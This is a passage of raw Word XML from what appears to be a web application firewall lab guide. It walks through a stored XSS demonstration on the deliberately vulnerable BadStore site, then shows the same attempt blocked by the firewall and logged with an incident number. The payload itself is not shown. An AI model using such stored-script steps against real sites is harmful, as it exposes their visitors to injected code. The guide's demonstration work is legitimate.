          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0D276A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0D276A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">fancy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="55C52C3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>double quotes</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, so after pasting this string in, </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="5BB89A16">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">you might need to </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">manually go and </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="6CEF8760">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">delete and then </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">re-enter </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="04EF5216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by hand, </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="13A730E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">both </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the beginning and ending double quotes</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0ECD24ED">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="4CBE4E3E" w:rsidRDefault="32F6121D" w14:paraId="4C0F807E" w14:textId="01471D5E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="144C20C9">
        <w:drawing>
          <wp:inline wp14:editId="5B50FF77" wp14:anchorId="76E999E8">
            <wp:extent cx="4189751" cy="1228725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="577336550" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R197955a01daa49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189751" cy="1228725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="05DC7F0B" w14:textId="44631BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Click Add Entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="7A39CF6F" w14:textId="1BDB5090">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="1300CF1F" w14:textId="5C6F83E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice the message</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="28528A39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> box </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="03146751">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with the nasty message</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5942522B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>! And</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4257F7A7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="28528A39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every time somebody adds a comment, this message will pop up</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="56E9E242">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in their browser</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="58A718A1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="56E9E242">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0CC038C3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is a great example of a simple yet effective XSS hack</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="6DDA1FC7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that you can show the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="74A39750" w14:textId="4148B56C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="7A452791" w14:textId="02E50937">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="177F5368">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Attack </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="177F5368">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="177F5368">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="0AB2AAE5" w14:textId="5B227F6D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="177F5368">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint: </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="50C59F9F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS protection is on by default.</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="09ED6B8C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  You do not have to add any components to enable this.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="59EDC2D0" w14:textId="46A1F522">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="35077BAE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="177F5368">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:hyperlink r:id="Rf0c96b908b8c40e7">
        <w:r w:rsidRPr="16AED19E" w:rsidR="22DF7982">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="16AED19E" w:rsidR="22DF7982">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and repeat step</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="634EC9E2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="22DF7982">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="634EC9E2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and 4 as above. </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="36DC73F7">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="1BBB75F9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="4670D621" w14:textId="7FC100E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="1BBB75F9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice you get a Blocked Page</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="08DE2B26" w14:textId="0C170E0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="756A3369">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At the bottom of t</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he Blocked Page </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="25942CE7">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s your IP Address </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an incident number </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="625D3A34" w14:textId="1A63BC81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="7DD5B890">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cross reference </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="768C00DF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that incident number </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in the WAF </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5FC4CFE2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="4CBE4E3E" w:rsidRDefault="32F6121D" w14:paraId="54BD724E" w14:textId="3294AFB2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5FC4CFE2">
        <w:drawing>
          <wp:inline wp14:editId="76584154" wp14:anchorId="4A825EFD">
            <wp:extent cx="3467100" cy="2039144"/>
